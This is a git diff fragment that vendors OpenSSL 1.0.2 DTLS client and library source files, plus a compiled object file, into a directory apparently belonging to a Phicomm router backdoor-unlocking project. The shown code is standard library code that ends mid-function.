+            SSLerr(SSL_F_DTLS1_CONNECT, SSL_R_UNKNOWN_STATE);
+            ret = -1;
+            goto end;
+            /* break; */
+        }
+
+        /* did we do anything */
+        if (!s->s3->tmp.reuse_message && !skip) {
+            if (s->debug) {
+                if ((ret = BIO_flush(s->wbio)) <= 0)
+                    goto end;
+            }
+
+            if ((cb != NULL) && (s->state != state)) {
+                new_state = s->state;
+                s->state = state;
+                cb(s, SSL_CB_CONNECT_LOOP, 1);
+                s->state = new_state;
+            }
+        }
+        skip = 0;
+    }
+ end:
+    s->in_handshake--;
+
+#ifndef OPENSSL_NO_SCTP
+    /*
+     * Notify SCTP BIO socket to leave handshake mode and allow stream
+     * identifier other than 0. Will be ignored if no SCTP is used.
+     */
+    BIO_ctrl(SSL_get_wbio(s), BIO_CTRL_DGRAM_SCTP_SET_IN_HANDSHAKE,
+             s->in_handshake, NULL);
+#endif
+
+    if (buf != NULL)
+        BUF_MEM_free(buf);
+    if (cb != NULL)
+        cb(s, SSL_CB_CONNECT_EXIT, ret);
+    return (ret);
+}
+
+static int dtls1_get_hello_verify(SSL *s)
+{
+    int n, al, ok = 0;
+    unsigned char *data;
+    unsigned int cookie_len;
+
+    s->first_packet = 1;
+    n = s->method->ssl_get_message(s,
+                                   DTLS1_ST_CR_HELLO_VERIFY_REQUEST_A,
+                                   DTLS1_ST_CR_HELLO_VERIFY_REQUEST_B,
+                                   -1, s->max_cert_list, &ok);
+    s->first_packet = 0;
+
+    if (!ok)
+        return ((int)n);
+
+    if (s->s3->tmp.message_type != DTLS1_MT_HELLO_VERIFY_REQUEST) {
+        s->d1->send_cookie = 0;
+        s->s3->tmp.reuse_message = 1;
+        return (1);
+    }
+
+    data = (unsigned char *)s->init_msg;
+#if 0
+    if (s->method->version != DTLS_ANY_VERSION &&
+        ((data[0] != (s->version >> 8)) || (data[1] != (s->version & 0xff))))
+    {
+        SSLerr(SSL_F_DTLS1_GET_HELLO_VERIFY, SSL_R_WRONG_SSL_VERSION);
+        s->version = (s->version & 0xff00) | data[1];
+        al = SSL_AD_PROTOCOL_VERSION;
+        goto f_err;
+    }
+#endif
+    data += 2;
+
+    cookie_len = *(data++);
+    if (cookie_len > sizeof(s->d1->cookie)) {
+        al = SSL_AD_ILLEGAL_PARAMETER;
+        goto f_err;
+    }
+
+    memcpy(s->d1->cookie, data, cookie_len);
+    s->d1->cookie_len = cookie_len;
+
+    s->d1->send_cookie = 1;
+    return 1;
+
+ f_err:
+    ssl3_send_alert(s, SSL3_AL_FATAL, al);
+    return -1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/d1_clnt.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/d1_clnt.o
new file mode 100644
index 0000000000000000000000000000000000000000..e9e29717b0c3e29f7018904c5c14dcd116e52e87
GIT binary patch
literal 11712
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/d1_lib.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/d1_lib.c
new file mode 100644
index 0000000..2845757
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/d1_lib.c
@@ -0,0 +1,570 @@
+/* ssl/d1_lib.c */
+/*
+ * DTLS implementation written by Nagendra Modadugu
+ * (nagendra@cs.stanford.edu) for the OpenSSL project 2005.
+ */
+/* ====================================================================
+ * Copyright (c) 1999-2005 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#define USE_SOCKETS
+#include <openssl/objects.h>
+#include "ssl_locl.h"
+
+#if defined(OPENSSL_SYS_VMS)
+# include <sys/timeb.h>
+#endif
+
+static void get_current_time(struct timeval *t);
+static void dtls1_set_handshake_header(SSL *s, int type, unsigned long len);
+static int dtls1_handshake_write(SSL *s);
+const char dtls1_version_str[] = "DTLSv1" OPENSSL_VERSION_PTEXT;
+int dtls1_listen(SSL *s, struct sockaddr *client);
+
+SSL3_ENC_METHOD DTLSv1_enc_data = {
+    tls1_enc,
+    tls1_mac,
+    tls1_setup_key_block,
+    tls1_generate_master_secret,
+    tls1_change_cipher_state,
+    tls1_final_finish_mac,
+    TLS1_FINISH_MAC_LENGTH,
+    tls1_cert_verify_mac,
+    TLS_MD_CLIENT_FINISH_CONST, TLS_MD_CLIENT_FINISH_CONST_SIZE,
+    TLS_MD_SERVER_FINISH_CONST, TLS_MD_SERVER_FINISH_CONST_SIZE,
+    tls1_alert_code,
+    tls1_export_keying_material,
+    SSL_ENC_FLAG_DTLS | SSL_ENC_FLAG_EXPLICIT_IV,
+    DTLS1_HM_HEADER_LENGTH,
+    dtls1_set_handshake_header,
+    dtls1_handshake_write
+};
+
+SSL3_ENC_METHOD DTLSv1_2_enc_data = {
+    tls1_enc,
+    tls1_mac,
+    tls1_setup_key_block,
+    tls1_generate_master_secret,
+    tls1_change_cipher_state,
+    tls1_final_finish_mac,
+    TLS1_FINISH_MAC_LENGTH,
+    tls1_cert_verify_mac,
+    TLS_MD_CLIENT_FINISH_CONST, TLS_MD_CLIENT_FINISH_CONST_SIZE,
+    TLS_MD_SERVER_FINISH_CONST, TLS_MD_SERVER_FINISH_CONST_SIZE,
+    tls1_alert_code,
+    tls1_export_keying_material,
+    SSL_ENC_FLAG_DTLS | SSL_ENC_FLAG_EXPLICIT_IV | SSL_ENC_FLAG_SIGALGS
+        | SSL_ENC_FLAG_SHA256_PRF | SSL_ENC_FLAG_TLS1_2_CIPHERS,
+    DTLS1_HM_HEADER_LENGTH,
+    dtls1_set_handshake_header,
+    dtls1_handshake_write
+};
+
+long dtls1_default_timeout(void)
+{
+    /*
+     * 2 hours, the 24 hours mentioned in the DTLSv1 spec is way too long for
+     * http, the cache would over fill
+     */
+    return (60 * 60 * 2);
+}
+
+int dtls1_new(SSL *s)
+{
+    DTLS1_STATE *d1;
+
+    if (!ssl3_new(s))
+        return (0);
+    if ((d1 = OPENSSL_malloc(sizeof *d1)) == NULL)
+        return (0);
+    memset(d1, 0, sizeof *d1);
+
+    /* d1->handshake_epoch=0; */
+
+    d1->unprocessed_rcds.q = pqueue_new();
+    d1->processed_rcds.q = pqueue_new();
+    d1->buffered_messages = pqueue_new();
+    d1->sent_messages = pqueue_new();
+    d1->buffered_app_data.q = pqueue_new();
+
+    if (s->server) {
+        d1->cookie_len = sizeof(s->d1->cookie);
+    }
+
+    d1->link_mtu = 0;
+    d1->mtu = 0;
+
+    if (!d1->unprocessed_rcds.q || !d1->processed_rcds.q
+        || !d1->buffered_messages || !d1->sent_messages
+        || !d1->buffered_app_data.q) {
+        if (d1->unprocessed_rcds.q)
+            pqueue_free(d1->unprocessed_rcds.q);
+        if (d1->processed_rcds.q)
+            pqueue_free(d1->processed_rcds.q);
+        if (d1->buffered_messages)
+            pqueue_free(d1->buffered_messages);
+        if (d1->sent_messages)
+            pqueue_free(d1->sent_messages);
+        if (d1->buffered_app_data.q)
+            pqueue_free(d1->buffered_app_data.q);
+        OPENSSL_free(d1);
+        return (0);
+    }
+
+    s->d1 = d1;
+    s->method->ssl_clear(s);
+    return (1);
+}
+
+static void dtls1_clear_queues(SSL *s)
+{
+    pitem *item = NULL;
+    hm_fragment *frag = NULL;
+    DTLS1_RECORD_DATA *rdata;
+
+    while ((item = pqueue_pop(s->d1->unprocessed_rcds.q)) != NULL) {
+        rdata = (DTLS1_RECORD_DATA *)item->data;
+        if (rdata->rbuf.buf) {
+            OPENSSL_free(rdata->rbuf.buf);
+        }
+        OPENSSL_free(item->data);
+        pitem_free(item);
+    }
+
+    while ((item = pqueue_pop(s->d1->processed_rcds.q)) != NULL) {
+        rdata = (DTLS1_RECORD_DATA *)item->data;
+        if (rdata->rbuf.buf) {
+            OPENSSL_free(rdata->rbuf.buf);
+        }
+        OPENSSL_free(item->data);
+        pitem_free(item);
+    }
+
+    while ((item = pqueue_pop(s->d1->buffered_messages)) != NULL) {
+        frag = (hm_fragment *)item->data;
+        dtls1_hm_fragment_free(frag);
+        pitem_free(item);
+    }
+
+    while ((item = pqueue_pop(s->d1->sent_messages)) != NULL) {
+        frag = (hm_fragment *)item->data;
+        dtls1_hm_fragment_free(frag);
+        pitem_free(item);
+    }
+
+    while ((item = pqueue_pop(s->d1->buffered_app_data.q)) != NULL) {
+        rdata = (DTLS1_RECORD_DATA *)item->data;
+        if (rdata->rbuf.buf) {
+            OPENSSL_free(rdata->rbuf.buf);
+        }
+        OPENSSL_free(item->data);
+        pitem_free(item);
+    }
+}
+
+void dtls1_free(SSL *s)
+{
+    ssl3_free(s);
+
+    dtls1_clear_queues(s);
+
+    pqueue_free(s->d1->unprocessed_rcds.q);
+    pqueue_free(s->d1->processed_rcds.q);
+    pqueue_free(s->d1->buffered_messages);
+    pqueue_free(s->d1->sent_messages);
+    pqueue_free(s->d1->buffered_app_data.q);
+
+    OPENSSL_free(s->d1);
+    s->d1 = NULL;
+}
+
+void dtls1_clear(SSL *s)
+{
+    pqueue unprocessed_rcds;
+    pqueue processed_rcds;
+    pqueue buffered_messages;
+    pqueue sent_messages;
+    pqueue buffered_app_data;
+    unsigned int mtu;
+    unsigned int link_mtu;
+
+    if (s->d1) {
+        unprocessed_rcds = s->d1->unprocessed_rcds.q;
+        processed_rcds = s->d1->processed_rcds.q;
+        buffered_messages = s->d1->buffered_messages;
+        sent_messages = s->d1->sent_messages;
+        buffered_app_data = s->d1->buffered_app_data.q;
+        mtu = s->d1->mtu;
+        link_mtu = s->d1->link_mtu;
+
+        dtls1_clear_queues(s);
+
+        memset(s->d1, 0, sizeof(*(s->d1)));
+
+        if (s->server) {
+            s->d1->cookie_len = sizeof(s->d1->cookie);
+        }
+
+        if (SSL_get_options(s) & SSL_OP_NO_QUERY_MTU) {
+            s->d1->mtu = mtu;
+            s->d1->link_mtu = link_mtu;
+        }
+
+        s->d1->unprocessed_rcds.q = unprocessed_rcds;
+        s->d1->processed_rcds.q = processed_rcds;
+        s->d1->buffered_messages = buffered_messages;
+        s->d1->sent_messages = sent_messages;
+        s->d1->buffered_app_data.q = buffered_app_data;
+    }
+
+    ssl3_clear(s);
+    if (s->options & SSL_OP_CISCO_ANYCONNECT)
+        s->version = DTLS1_BAD_VER;
+    else if (s->method->version == DTLS_ANY_VERSION)
+        s->version = DTLS1_2_VERSION;
+    else
+        s->version = s->method->version;
+}
+
+long dtls1_ctrl(SSL *s, int cmd, long larg, void *parg)
+{
+    int ret = 0;
+
+    switch (cmd) {
+    case DTLS_CTRL_GET_TIMEOUT:
+        if (dtls1_get_timeout(s, (struct timeval *)parg) != NULL) {
+            ret = 1;
+        }
+        break;
+    case DTLS_CTRL_HANDLE_TIMEOUT:
+        ret = dtls1_handle_timeout(s);
+        break;
+    case DTLS_CTRL_LISTEN:
+        ret = dtls1_listen(s, parg);
+        break;
+    case SSL_CTRL_CHECK_PROTO_VERSION:
+        /*
+         * For library-internal use; checks that the current protocol is the
+         * highest enabled version (according to s->ctx->method, as version
+         * negotiation may have changed s->method).
+         */
+        if (s->version == s->ctx->method->version)
+            return 1;
+        /*
+         * Apparently we're using a version-flexible SSL_METHOD (not at its
+         * highest protocol version).
+         */
+        if (s->ctx->method->version == DTLS_method()->version) {
+#if DTLS_MAX_VERSION != DTLS1_2_VERSION
+# error Code needs update for DTLS_method() support beyond DTLS1_2_VERSION.
+#endif
+            if (!(s->options & SSL_OP_NO_DTLSv1_2))
+                return s->version == DTLS1_2_VERSION;
+            if (!(s->options & SSL_OP_NO_DTLSv1))
+                return s->version == DTLS1_VERSION;
+        }
+        return 0;               /* Unexpected state; fail closed. */
+    case DTLS_CTRL_SET_LINK_MTU:
+        if (larg < (long)dtls1_link_min_mtu())
+            return 0;
+        s->d1->link_mtu = larg;
+        return 1;
+    case DTLS_CTRL_GET_LINK_MIN_MTU:
+        return (long)dtls1_link_min_mtu();
+    case SSL_CTRL_SET_MTU:
+        /*
+         *  We may not have a BIO set yet so can't call dtls1_min_mtu()
+         *  We'll have to make do with dtls1_link_min_mtu() and max overhead
+         */
+        if (larg < (long)dtls1_link_min_mtu() - DTLS1_MAX_MTU_OVERHEAD)
+            return 0;
+        s->d1->mtu = larg;
+        return larg;
+    default:
+        ret = ssl3_ctrl(s, cmd, larg, parg);
+        break;
+    }
+    return (ret);
+}
+
+/*
+ * As it's impossible to use stream ciphers in "datagram" mode, this
+ * simple filter is designed to disengage them in DTLS. Unfortunately
+ * there is no universal way to identify stream SSL_CIPHER, so we have
+ * to explicitly list their SSL_* codes. Currently RC4 is the only one
+ * available, but if new ones emerge, they will have to be added...
+ */
+const SSL_CIPHER *dtls1_get_cipher(unsigned int u)
+{
+    const SSL_CIPHER *ciph = ssl3_get_cipher(u);
+
+    if (ciph != NULL) {
+        if (ciph->algorithm_enc == SSL_RC4)
+            return NULL;
+    }
+
+    return ciph;
+}
+
+void dtls1_start_timer(SSL *s)
+{
+#ifndef OPENSSL_NO_SCTP
+    /* Disable timer for SCTP */
+    if (BIO_dgram_is_sctp(SSL_get_wbio(s))) {
+        memset(&(s->d1->next_timeout), 0, sizeof(struct timeval));
+        return;
+    }
+#endif
+
+    /* If timer is not set, initialize duration with 1 second */
+    if (s->d1->next_timeout.tv_sec == 0 && s->d1->next_timeout.tv_usec == 0) {
+        s->d1->timeout_duration = 1;
+    }
+
+    /* Set timeout to current time */
+    get_current_time(&(s->d1->next_timeout));
+
+    /* Add duration to current time */
+    s->d1->next_timeout.tv_sec += s->d1->timeout_duration;
+    BIO_ctrl(SSL_get_rbio(s), BIO_CTRL_DGRAM_SET_NEXT_TIMEOUT, 0,
+             &(s->d1->next_timeout));
+}
+
+struct timeval *dtls1_get_timeout(SSL *s, struct timeval *timeleft)
+{
+    struct timeval timenow;
+
+    /* If no timeout is set, just return NULL */
+    if (s->d1->next_timeout.tv_sec == 0 && s->d1->next_timeout.tv_usec == 0) {
+        return NULL;
+    }
+
+    /* Get current time */
+    get_current_time(&timenow);
+
+    /* If timer already expired, set remaining time to 0 */
+    if (s->d1->next_timeout.tv_sec < timenow.tv_sec ||
+        (s->d1->next_timeout.tv_sec == timenow.tv_sec &&
+         s->d1->next_timeout.tv_usec <= timenow.tv_usec)) {
+        memset(timeleft, 0, sizeof(struct timeval));
+        return timeleft;
+    }
+
+    /* Calculate time left until timer expires */
+    memcpy(timeleft, &(s->d1->next_timeout), sizeof(struct timeval));
+    timeleft->tv_sec -= timenow.tv_sec;
+    timeleft->tv_usec -= timenow.tv_usec;
+    if (timeleft->tv_usec < 0) {
+        timeleft->tv_sec--;
+        timeleft->tv_usec += 1000000;
+    }
+
+    /*
+     * If remaining time is less than 15 ms, set it to 0 to prevent issues
+     * because of small devergences with socket timeouts.
+     */
+    if (timeleft->tv_sec == 0 && timeleft->tv_usec < 15000) {
+        memset(timeleft, 0, sizeof(struct timeval));
+    }
+
+    return timeleft;
+}
+
+int dtls1_is_timer_expired(SSL *s)
+{
+    struct timeval timeleft;
+
+    /* Get time left until timeout, return false if no timer running */
+    if (dtls1_get_timeout(s, &timeleft) == NULL) {
+        return 0;
+    }
+
+    /* Return false if timer is not expired yet */
+    if (timeleft.tv_sec > 0 || timeleft.tv_usec > 0) {
+        return 0;
+    }
+
+    /* Timer expired, so return true */
+    return 1;
+}
+
+void dtls1_double_timeout(SSL *s)
+{
+    s->d1->timeout_duration *= 2;
+    if (s->d1->timeout_duration > 60)
+        s->d1->timeout_duration = 60;
+    dtls1_start_timer(s);
+}
+
+void dtls1_stop_timer(SSL *s)
+{
+    /* Reset everything */
+    memset(&(s->d1->timeout), 0, sizeof(struct dtls1_timeout_st));
+    memset(&(s->d1->next_timeout), 0, sizeof(struct timeval));
+    s->d1->timeout_duration = 1;
+    BIO_ctrl(SSL_get_rbio(s), BIO_CTRL_DGRAM_SET_NEXT_TIMEOUT, 0,
+             &(s->d1->next_timeout));
+    /* Clear retransmission buffer */
+    dtls1_clear_record_buffer(s);
+}
+
+int dtls1_check_timeout_num(SSL *s)
+{
+    unsigned int mtu;
+
+    s->d1->timeout.num_alerts++;
+
+    /* Reduce MTU after 2 unsuccessful retransmissions */
+    if (s->d1->timeout.num_alerts > 2
+        && !(SSL_get_options(s) & SSL_OP_NO_QUERY_MTU)) {
+        mtu =
+            BIO_ctrl(SSL_get_wbio(s), BIO_CTRL_DGRAM_GET_FALLBACK_MTU, 0,
+                     NULL);
+        if (mtu < s->d1->mtu)
+            s->d1->mtu = mtu;
+    }
+
+    if (s->d1->timeout.num_alerts > DTLS1_TMO_ALERT_COUNT) {
+        /* fail the connection, enough alerts have been sent */
+        SSLerr(SSL_F_DTLS1_CHECK_TIMEOUT_NUM, SSL_R_READ_TIMEOUT_EXPIRED);
+        return -1;
+    }
+
+    return 0;
+}
+
+int dtls1_handle_timeout(SSL *s)
+{
+    /* if no timer is expired, don't do anything */
+    if (!dtls1_is_timer_expired(s)) {
+        return 0;
+    }
+
+    dtls1_double_timeout(s);
+
+    if (dtls1_check_timeout_num(s) < 0)
+        return -1;
+
+    s->d1->timeout.read_timeouts++;
+    if (s->d1->timeout.read_timeouts > DTLS1_TMO_READ_COUNT) {
+        s->d1->timeout.read_timeouts = 1;
+    }
+#ifndef OPENSSL_NO_HEARTBEATS
+    if (s->tlsext_hb_pending) {
+        s->tlsext_hb_pending = 0;
+        return dtls1_heartbeat(s);
+    }
+#endif
+
+    dtls1_start_timer(s);
+    return dtls1_retransmit_buffered_messages(s);
+}
+
+static void get_current_time(struct timeval *t)
+{
